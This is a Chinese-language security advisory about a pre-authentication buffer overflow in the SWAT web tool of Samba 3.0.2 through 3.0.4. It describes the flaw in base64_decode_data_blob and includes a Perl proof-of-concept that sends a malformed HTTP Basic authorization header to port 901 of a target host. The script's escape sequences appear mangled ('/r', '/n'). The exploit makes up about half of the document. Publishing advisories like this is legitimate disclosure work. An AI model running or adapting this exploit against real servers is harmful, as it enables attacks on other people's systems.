Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

受影响系统

Samba 3.0.2
               Samba 3.0.3
               Samba 3.0.4

详细描述
SWAT是Samba Web管理工具。

Samba SWAT服务预验证存在缓冲区溢出问题，远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.

测试代码
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected/n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1/r
Host: $host:901/r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1/r
Accept: text/xml/r
Accept-Language: en-us,en;q=0.5/r
Accept-Encoding: gzip,deflate/r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7/r
Keep-Alive: 300/r
Connection: keep-alive/r
Authorization: Basic =/r
/r
";

print "HTTP: [$http]/n";
print $remote $http;
sleep(1);
print "Sent/n";

while (<$remote>)
{
print $_;
}
print "/n";

close $remote;